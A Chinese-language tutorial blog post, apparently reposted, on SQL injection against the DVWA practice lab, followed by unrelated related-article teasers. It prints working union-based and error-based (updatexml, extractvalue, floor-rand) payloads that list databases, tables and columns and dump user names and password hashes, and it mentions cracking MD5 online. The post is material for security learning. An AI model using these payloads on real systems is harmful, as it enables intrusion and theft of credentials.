SQL注入之联合查询注入与报错注入

news2024/10/7 6:44:44

数据来源

        本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。

SQL注入之联合查询

sql注入简单演示

1. 判断sq注入 

2. 闭合然后爆列

3. 查看显示列

4. 查看库,查看表

查看 concat、concat_ws、group_concat区别

 操作演示看这篇拉到最后一段:MySQL基础

报错注入 

updatexml 示例:(下面用DVWA靶场进行演示)

1. 爆出数据库及相关信息(下面演示的代码来源)

1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#

2.  爆当前数据库表信息(就是这个数据库有多少张表,都列出来)

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

3. 爆users表字段信息 

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #

4. 爆dvwa数据库的users表的字段内容 (first_name、last_name )

1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #

5. 爆出users表的第一条数据的user和password('limit ?,?'    # ? 开始查询的索引 , ? 要查多少条数据)

1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

md5在线解密破解,md5解密加密

extractvalue() 报错注入实战

        extractvalue()函数其实与updatexml()函数大同小异,都是通过xpath路径错误报错,而本人的示例中皆为利用0x7e(~),其不属于xpath语法格式,因此报出xpath语法错误。

1. 查看当前数据库的相关信息 

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

2. 查数据库的表

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #

3. 爆users表字段信息 

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #

4. 爆dvwa数据库的users表的字段内容 (user_id、first_name、last_name )

1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

如果要查看DVWA靶场的数据库,在浏览器中输入:http://127.0.0.1/phpmyadmin/index.php

SQL注入之宽字节注入

宽字节注入原理

小葵转换工具 

太晚了,洗澡睡觉,实际操作演示有时间在补上

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/173085.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vue中实现后台系统权限管理的功能

vue中实现后台系统权限管理的功能

一、前言 后台管理系统的权限控制对于前端来说是经常用到的知识点,也比较重要,最近梳理一下写成文章,方便以后查阅。 项目中实现菜单的动态权限控制使用到了两种技术,一种是Vue Router,另一种是vue3官方推荐使用的专属…
阅读更多...
蓝桥杯嵌入式第十届学习记录

蓝桥杯嵌入式第十届学习记录

1:拷贝LCD工程代码作为模板2:注意放置代码得顺序3:注意公共头函数键盘4:串口配置出来方便dubug模式正常接收数据5:记得打定时器中断(去历程定时器里面寻找!)6:细节地方7;LCD每个位置…
阅读更多...
[hive]数仓分层|用户纬度拉链表|维度建模

[hive]数仓分层|用户纬度拉链表|维度建模

https://www.modb.pro/404?redirect%2Fdb%2F241289一、数仓分层1、ODS层:原始数据层ODS(Ooriginal Ddata Sstore)1)设计要点存储来自多个业务系统、前端埋点、爬虫获取的一系列数据源的数据。我们要做三件事:【1】保持数据原貌不做任何修改,…
阅读更多...
一阶高通滤波器学习

一阶高通滤波器学习

导读:本期文章主要介绍一阶高通滤波器。一阶高通滤波器与一阶低通滤波器很相似,都是利用电容阻低频信号通高频信号,电感阻高频信号通低频信号的特点。一、一阶高通滤波器介绍滤波器是作为一种选频装置,是信号处理中的一个重要的概…
阅读更多...
Linux(二)进程概念

Linux(二)进程概念

目录 一、冯诺依曼体系结构 二、操作系统 三、进程概念 1、程序与进程的区别: 2、cpu分时机制 3、pcb——进程控制块 4、进程是什么? 四、进程状态 1、linux状态 2、僵尸态 pid_t fork(void): fork创建进程之后,父子进…
阅读更多...
vector以及list

vector以及list

之前已经学习过了string类,接下来介绍c中的另外两个类—— vector和list; vector 之前介绍的string类是c所特定的字符数组; 而vector可以看做是string类的扩展,因为它是一个模板类; 它可以作为任何类型的数组&#x…
阅读更多...
小侃设计模式(廿二)-访问者模式

小侃设计模式(廿二)-访问者模式

1.概述 访问者模式(Visitor Pattern)指的是在类的内部结构不变的情况下,不同的访问者访问这个对象都会呈现出不同的处理方式。它的主要作用时将数据结构与数据操作分离,将不同的算法与其所作用的对象进行分离。本文将详述访问者模…
阅读更多...
DW动手学数据分析Task2:数据清洗及特征处理

DW动手学数据分析Task2:数据清洗及特征处理

文章目录一 数据清洗1 缺失值观察与处理1.1 缺失值观察1.2 缺失值处理2 重复值观察与处理二 特征处理1 分箱(离散化)处理2 对文本变量进行转换3 从纯文本Name特征里提取出Titles的特征3 参考文章一 数据清洗 数据清洗:我们拿到的数据通常是不…
阅读更多...
树的知识概括锦囊(一)

树的知识概括锦囊(一)

作者:爱塔居 专栏:数据结构 作者简介:大三学生,希望跟大家一起进步! 文章目录 目录 文章目录 一、树形结构 二、树的基础知识 三、二叉树 3.1 概念 3.2 特殊的二叉树 ​编辑 3.3 二叉树的性质 四、习题挑战 一、树形结…
阅读更多...
手把手教你学51单片机-如何学习单片机

手把手教你学51单片机-如何学习单片机

大多数大学生之所以最后变的平庸,不是因为脑子多么笨,也不是全怪自己贪玩不上进,只是没有一个好的领路人,许多学校可能挂着导师的名头,但是多数是挂羊头卖狗肉或者是干脆不管。最后等大学生毕业之后,那些所谓的老师就会说学生很差或者学习很差,反正就是跟自己没啥关系。…
阅读更多...
OSPF综合实验(华为)

OSPF综合实验(华为)

题目: 思路: 首先配置每个区域的路由和环回地址,其次,根据题目要求打通每个网络的连接,区域0用MGRE打通网络,区域4需要重发布,其次再考虑优化的问题。ip地址的规划是为了更好的路由汇总&#x…
阅读更多...
《 Unity Shader 入门精要》第5章 开始 Unity Shader 学习之旅

《 Unity Shader 入门精要》第5章 开始 Unity Shader 学习之旅

第5章 开始 Unity Shader 学习之旅 5.2 一个最简单的顶点/片元着色器 顶点/片元着色器的基本结构 // Upgrade NOTE: replaced mul(UNITY_MATRIX_MVP,*) with UnityObjectToClipPos(*)// 定义 shader 的名字 Shader "Chapter 5/Simple Shader" {SubShader{Pass {//…
阅读更多...
自动驾驶控制算法之车辆横向控制(project)

自动驾驶控制算法之车辆横向控制(project)

本文为深蓝学院-自动驾驶控制与规划-第三章作业 目录 1 projection introduction 2 思路提示 2.1 ComputeControlCmd 2.2 ComputeLateralErrors 3 Corer Case 3.1 Low speed operation 3.2 Extra damping on heading 3.3 Steer into constant radius curve 4 ROSLGSV…
阅读更多...
FFmpeg-4.2.4的filter: drawbox源码分析

FFmpeg-4.2.4的filter: drawbox源码分析

1. vf_drawbox.c功能 有两个功能 ,添加方框,和添加网格; 1.1 添加方框效果 1.2 添加网格效果
阅读更多...
c++数据结构-树(详细总结附代码,一看就懂)

c++数据结构-树(详细总结附代码,一看就懂)

树的定义一棵树是由n(n>0)个元素组成的有限集合,其中:(1)每个元素称为结点(node)(2)有一个特定的结点,称为根结点或树根(root&…
阅读更多...
上海亚商投顾:双创指数低开高走,数字经济继续活跃

上海亚商投顾:双创指数低开高走,数字经济继续活跃

上海亚商投顾前言:无惧大盘涨跌,解密龙虎榜资金,跟踪一线游资和机构资金动向,识别短期热点和强势个股。市场情绪三大指数今日低开高走,创业板指午后涨超1%,科创50指数涨超1.6%。数字经济概念继续爆发&#…
阅读更多...
算法基础(一):时间复杂度和空间复杂度

算法基础(一):时间复杂度和空间复杂度

算法基础(一):时间复杂度和空间复杂度时间复杂度 O(1)O(1)O(1) O(N)O(N)O(N) O(logN)O(log N)O(logN) O(MN)O(MN)O(MN) O(NlogN)O(Nlog N)O(NlogN)、O(MlogN)O(Mlog N)O(MlogN) O(N2)O(N^2)O(N2)空间复杂度一些算法基础知识点和leetcode题解&…
阅读更多...
【网络通信】【电信运营商实战工程师】思科设备篇-思科设备企业网实战

【网络通信】【电信运营商实战工程师】思科设备篇-思科设备企业网实战

电信运营商实战工程师系列文章. 思科设备篇-思科设备企业网实战. 文章目录1. 思科设备基本开局配置2. ARP协议、交换机工作原理及广播风暴问题3. 思科设备 VLAN 及单臂路由实战4. 思科三层交换机实现 VLAN 间路由实战5. 思科设备静态默认及浮动路由实战6. 思科设备NAT实战全集1…
阅读更多...
YOLO_V8训练自己的数据集

YOLO_V8训练自己的数据集

YOLO_V8在2023年开年横空出世,在春节前还得卷一下。由于YOLO_V8和YOLO_V5是同一个作者,所以很多操作都是一样的,下面主要描述一下如何用自己的数据集进行训练和测试(非命令行的方式)。1、训练数据和模型的目录结构这里…
阅读更多...
设计模式学习(九):Abstract Factory抽象工厂模式

设计模式学习(九):Abstract Factory抽象工厂模式

目录 一、什么是Abstract Factory模式 二、Abstract Factory示例代码 2.1 类之间的关系 2.2 抽象的零件:ltem类 2.3 抽象的零件:Link类 2.4 抽象的零件:Tray类 2.5 抽象的产品: Page类 2.6 抽象的工厂:Factory类 2.7 使用工厂将零件组装称为产品:Main类 2.8 具体的工厂…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023